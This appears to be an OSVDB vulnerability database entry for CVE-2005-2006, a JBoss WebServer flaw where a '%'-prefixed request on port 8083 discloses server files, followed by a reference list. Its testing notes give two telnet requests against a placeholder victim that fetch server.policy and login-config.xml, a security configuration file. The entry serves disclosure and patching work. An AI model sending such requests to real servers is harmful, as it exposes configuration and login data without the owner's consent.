JBoss org.jboss.web.WebServer Class % File Request Source Disclosure

2005-06-17T06:45:09
ID OSVDB:17403
Type osvdb
Reporter OSVDB
Modified 2005-06-17T06:45:09

Description

Manual Testing Notes

$ telnet [victim] 8083
GET %server.policy HTTP/1.0

$ telnet [victim] 8083
GET %login-config.xml

References:

Vendor URL: http://www.illegalaccess.org/java/jboss_path.php
Vendor Specific Advisory URL
Vendor Specific Advisory URL
Vendor Specific Advisory URL
Security Tracker: 1014234
Secunia Advisory ID: 21118
Secunia Advisory ID: 18789
Secunia Advisory ID: 15746
Secunia Advisory ID: 17559
Related OSVDB ID: 17402
Related OSVDB ID: 17404
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-07/0044.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0144.html
CVE-2005-2006